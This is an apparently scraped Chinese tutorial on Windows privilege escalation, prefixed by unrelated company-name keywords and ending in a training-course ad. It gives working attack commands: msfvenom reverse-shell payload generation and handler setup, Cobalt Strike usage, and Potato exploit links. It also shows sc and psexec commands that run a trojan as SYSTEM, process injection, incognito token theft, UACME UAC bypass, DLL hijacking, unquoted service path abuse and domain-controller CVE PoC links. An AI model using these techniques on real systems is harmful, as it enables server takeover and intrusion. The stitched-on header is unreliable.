网站设计科技有限公司浙江省建设工程质监站网站

网站设计科技有限公司,浙江省建设工程质监站网站,甘肃艾欧网络科技有限公司,国际贸易采购平台**文章目录结构 ** 前置知识 windows权限的划分 提权的方式WEB--操作系统的提权 内核漏洞提权 工具提权 手工提权 土豆家族管理员--操作系统提权 服务启动提权 远程控制提权 进程注入 令牌窃取 UAC绕过 DLL劫持提权 …**文章目录结构**前置知识 windows权限的划分 提权的方式WEB--操作系统的提权 内核漏洞提权 工具提权 手工提权 土豆家族管理员--操作系统提权 服务启动提权 远程控制提权 进程注入 令牌窃取 UAC绕过 DLL劫持提权 不安全的服务路径 不安全的服务权限域控提权技术前置知识windows权限的划分System系统组拥有管理系统资源的权限包括文件、目录和注册表等。Administrators管理员组默认情况下Administrators中的用户对计算机/域有不受限制的完全访问权。Users普通用户组,这个组的用户无法进行有意或无意的改动。Guests来宾组,来宾跟普通Users的成员有同等访问权但来宾帐户的限制更多Everyone所有的用户这个计算机上的所有用户都属于这个组。这几种是比较常见的还有Power Users高级用户组等提权的方式内核溢出漏洞提权数据库类型提权第三方软件应用提权本篇文章主要是介绍内核溢出漏洞提权以及一些win特性导致的提权数据库提权的话是一种单独的技术这和win没有太大的关系linux上也是一样之后会单独出一篇关于数据库提权的第三方软件应用提权主要指的是类似于向日葵等远控软件连接密码的获取会合到数据库提权中。WEB–操作系统的提权内核漏洞提权市面上作为服务器使用较多的操作系统有Windows Server 2008、2012、2016我这里折中一下选用2012做****演示我这里为了贴近真实环境直接买计时服务器演示各位下去可以用虚拟机实验。工具提权我先演示工具提权我这里是WEB到操作系统的权限提升MSF(不推荐)使用msf生成木马通过webshell上传到对方服务器上msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.139.141 LPORT3333 -f exe -o msf.exemsf配置好监听然后run再运行木马程序use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 0.0.0.0set lport 3333exploit收到回话然后我们通过msf的漏洞筛选模块筛选一下可能存在的内核漏洞use post/multi/recon/local_exploit_suggesterset showdescription true绿色就代表可能存在再利用exp提权use exploit/windows/local/ms16_075_reflection_juicyset session 1exploit这里选择一个经典的烂土豆进行提取但是看到它这里说成功但是没有会话产生,看样子是失败了这种情况下有几种情况我们需要排查一下可能这个漏洞利用产生的会话需要反弹我们可以尝试一下(但是它这里不是这个问题就是利用失败了)。因为我们使用的MSF大多数是免费的公开版漏洞POC较少所以不推荐使用有条件的可以购买pro版本。CScs它自身只有一个提权利用所以我们主要是使用别人写好的插件里面的提权模块进行提权在服务器上启动cs./teamserver IP password创建监听器并生成木马还是一样的步骤上传到对方服务器上执行成功上线使用插件进行提权成功上线手工提权工具提权已经介绍完了工具提权的好处显然易见简单方便傻瓜式操作但是像MSF免费版poc太少Pro版本要花钱CS呢得等别人更新插件大多数也都是收费的。提权技术是一直在更新的所以我们需要掌握手工提权技术。手工提权步骤信息收集主要是搜集对方服务器上的补丁信息操作系统等补丁筛选根据对方的操作系统以及补丁情况筛选可能存在的漏洞EXP获取执行筛选后寻找对应编号的POC进行提权第一步_信息收集在对方服务器上使用Systeminfo命令获取信息第二步_补丁筛选这里推荐一个在线网站一个筛选工具在线网站https://i.hacking8.com/tiquan 网站使用:直接复制对方服务器Systeminfo的信息即可我们就可以根据对方的补丁信息在判断可能存在哪些漏洞在寻找POC进行利用利用工具wesng 项目地址https://github.com/bitsadmin/wesng 直接敲这条命令筛选 python wes.py systeminfo.txt --color -i Elevation of Privilege -o xxx.csv#systeminfo.txt 复制好的信息#--color 显示彩色输出#-i 是筛选漏洞功能#-o 导出筛选后的内容更多参数使用各位执行下去查得到可能存在的漏洞后就进入下一步。第三步_EXP获取执行这里推荐几个漏洞POC集合项目KernelHub 针对常用溢出编号指定找EXPhttps://github.com/Ascotbe/Kernelhub Poc-in-Github 针对年份及编号指定找EXPhttps://github.com/nomi-sec/PoC-in-GitHub exploitdb 针对类型及关键说明指定找EXPhttps://gitlab.com/exploit-database/exploitdb这里有一点要注意网上公开的exp也是别人写好的如果使用后没有效果不一定是服务器上没有这个漏洞可能是环境的问题作者在它当时的环境下可能可以成功所以如果遇到提权失败可以多换几个POC手工提权大致流程就是这样但是这个流程比较繁琐有没有更简单的必须有接下来介绍土豆提权如果一个人不懂土豆提权那么他win提权就白学了。土豆家族介绍土豆(potato)提权通常用在我们获取WEB/数据库权限的时候可以将低权限的服务用户提升为“NT AUTHORITY\SYSTEM”特权。**土豆提权原理**土豆系列提权的核心是NTLM中继通过欺骗运行在高权限Administrator/SYSTEM的账户进行ntlm认证同时作为中间人对认证过程进行劫持和重放最后调用本地认证接口使用高权限账号的ntml认证获取一个高权限token只要当前进程拥有SeImpersonatePrivilege权限即可进行令牌模仿即可取得对应权限。目前网上的土豆提权系列共有12种基本覆盖了Windows系统的全系列我这里挑几个演示。BadPotatoGodPotatoPrintNotifyPotato各土豆的利用版本以及下载地址GodPotato作用范围Windows Server 2012 - Windows Server 2022、Windows8 - Windows 11https://github.com/BeichenDream/GodPotatoSweetPotato作用范围从Windows 7到Windows 10 / Server 2019https://github.com/CCob/SweetPotatoRoguePotato作用范围Win 10(部分版本)和Win Server 19https://github.com/antonioCoco/RoguePotatoBadPotato作用范围Windows 2012-2019、Windows 8-10https://github.com/BeichenDream/BadPotatoEfsPotato作用范围未知https://github.com/zcgonvh/EfsPotatoMultiPotato作用范围未知https://github.com/S3cur3Th1sSh1t/MultiPotatoCandyPotato作用范围win10和server2016https://github.com/klezVirus/CandyPotatoRasmanPotato作用范围Windows 10(11 not test), Windows Server 2012 - 2019(2022 not test)https://github.com/crisprss/RasmanPotatoPetitPotato作用范围未知https://github.com/wh0amitz/PetitPotatoJuicyPotatoNG作用范围Windows 10 - 11 Windows Server 2012 - 2022https://github.com/antonioCoco/JuicyPotatoNGPrintNotifyPotato作用范围Windows 10 - 11 Windows Server 2012 - 2022https://github.com/BeichenDream/PrintNotifyPotatoCoercedPotato作用范围Windows 10 - 11 Windows Server 2012 - 2022https://github.com/Prepouce/CoercedPotato管理员–操作系统提权服务启动提权SC介绍sc.exe为服务控制管理service control manager用于对计算机的系统服务进行管理实现注册运行暂停自启等基础操作用户能够将符合Windows系统服务化条件的程序进行本地系统后台服务化运行注册到服务注册表目录下的程序通过sc的指令实现程序执行状态的切换和管理。简单来说添加的服务默认为操作系统权限我们可以添加服务并把服务指向木马程序创建一项服务sc Create syscmd binPathC:\Users\Administrator\Desktop\httpd-2.4.58-win32-vs17\Apache24\htdocs\caigo8.exe开启创建的服务sc start syscmd远程控制提权psexec介绍PsExec 是一种轻量级 telnet 替代品可让你在其他系统上执行进程并为控制台应用程序提供完整交互性而无需手动安装客户端软件。PsExec 最强大的用途包括在远程系统上启动交互式命令提示符以及 IpConfig 等远程启用工具否则无法显示有关远程系统的信息。它启动的程序也会以操作系统权限启动而且这个psexec是微软官方的工具不存在查杀问题项目地址https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools‍使用shell psexec.exe -accepteula -s -i -d C:\Users\Administrator\Desktop\httpd-2.4.58-win32-vs17\Apache24\htdocs\caigo8.exe进程注入介绍进程注入是一种在某个单独的实时进程的地址空间中执行任意代码的方法。在一个进程的上下文中运行特定代码则有可能访问该进程的内存系统或网络资源以及提升权限这里演示工具使用MSF使用ps命令获取当前进程寻找system权限的然后最好是x86的migrate PIDCS也是一样先ps获取进程使用inject PID注入我这里只演示了提权进程注入也注低权限用户也就是降权令牌窃取介绍令牌Token是系统的临时密钥相当于账户名和密码用来决定是否允许这次请求和判断这次请求是属于哪一个用户的它允许你在不提供密码或其他凭证的前提下访问网络和系统资源这些令牌持续存在系统中除非系统重新启动。伪造令牌攻击的核心是 Kerberos 协议。其中注意令牌窃取并非提权这里也是演示工具MSFuse incognitolist_tokens -uimpersonate_token NT AUTHORITY\SYSTEMCSps //查看进程steal_token PID //窃取进程令牌spawnu PID //窃取进程令牌上线UAC绕过技术介绍用户帐户控制 (UAC) 有助于防止恶意程序也称为恶意软件损坏计算机并帮助组织部署更好的托管桌面。通过 UAC应用程序和任务可始终在非管理员帐户的安全上下文中运行除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装并防止无意中更改系统设置。那么这个东西对于我们提权会有什么影响呢对方如果开启了这个当我们运行一些程序时会出现这个界面我们实战情况下通常获取到的都是命令行又没办法在对方服务器上点确定所以会导致木马或者提权程序运行失败所以我们需要绕过它绕过项目UACME 项目地址https://github.com/hfiref0x/UACME 使用方式Akagi64.exe 编号 调用执行编号推荐 2361uac绕过不属于提权技术的一种只不过当我们在做权限提升的时候可能会遇到这种情况所以会用到它。DLL注入介绍在Windows系统中为了节省内存和实现代码重用微软在Windows操作系统中实现了一种共享函数库的方式。这就是DLLDynamic Link Library即动态链接库这种库包含了可由多个程序同时使用的代码和数据。简单来说就是win下的大部分程序在运行时都会加载一些DLL文件所谓DLL劫持就是替换程序在运行时会加载的DLL文件让程序加载我们生成的恶意DLL文件达到上线。注意**DLL劫持属于被动的权限提权获取到的权限主要是看程序是由谁运行的。**DLL劫持利用流程寻找受害程序优先寻找自启动的或者对方可能常用的测试程序启动时会调用的DLL文件并测试能否劫持生成同名称的恶意dLL文件进行替换等待服务器程序运行或管理员运行第一步_寻找受害程序:我这里选用flashfxp第二步_测试程序运行时加载的DLL文件我这里使用火绒剑选中运行程序查看它调用的DLL文件这里优先查看软件本身自带的因为系统中的DLL文件我们是没有权限替换的如果能替换的话我们也就没有必要提权了接下来测试DLL能否劫持使用工具ChkDllHijack项目地址https://github.com/anhkgg/anhkgg-tools这样就表示可以输出no就表示不行第三步_生成恶意DLL文件进行替换我这里使用CS生成修改名称替换第四步_等待服务器重启或者管理员运行不安全的服务路径不安全的服务路径是什么呢?win系统上的服务通常都会对应一个执行程序列如下图这个为什么会造成权限提升呢它这里指向的可执行程序是一个整体所以不会照成安全问题看下面这个它指向的执行文件路径是这个c:\program files (x86)\grasssoft\macro expert\MacroService.exe它没有使用双引号包裹说明它不是一个整体并且它的中间是有空格的c:\programfiles (x86):这个如果在执行的话会执行c:\program而files会被当初参数那么我们就可以生成名为program的木马放到c盘下服务启动时就会执行我们的木马了。服务检测命令wmic service get name,displayname,pathname,startmode |findstr /i Auto |findstr /i /v C:\Windows\\ |findstr /i /v 替换完成后使用sc重启服务即可sc start 服务名不安全的服务权限这个实战碰上的可能性太小了说白就是你能直接替换服务指向的可执行程序然后再开启服务但是假如说我是系统用户权限除非管理员瞎搞不然我是不能替换system启动服务的可执行程序的。检测脚本accesschk 项目地址https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk 使用方式accesschk.exe -uwcqv *普通用户是没有修改指向的权限的除非对方做了设置域控提权技术其实到这里win单机的提权技术就已经介绍完了但是为了完整性还是把域控提权加上。由于我机子没有内网环境所以只是简单提一下之后更新内网文章的时候会重点讲。域控提权目前主要的还是使用网上公开的几个CVE漏洞的POC攻击来进行权限提升。WIN-AD域控提权-CVE-2014-6324WIN-AD域控提权-CVE-2021-42287WIN-AD域控提权-CVE-2020-1472WIN-AD域控提权-CVE-2022-26923CVE-2014-6324利用条件需要域用户账号密码一台主机的管理员权限POC地址WindowsElevation/CVE-2014-6324 at master · Al1ex/WindowsElevation · GitHub⁤CVE-2021-42287利用条件只需要域用户账号密码POC地址https://github.com/WazeHell/sam-the-adminCVE-2020-1472CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权漏洞影响Windows Server 2008R2至Windows Server 2019的多个版本系统只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为Windows.poc地址https://github.com/SecuraBV/CVE-2020-1472CVE-2022-26923利用条件一个域内普通账号域内存在证书服务器学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】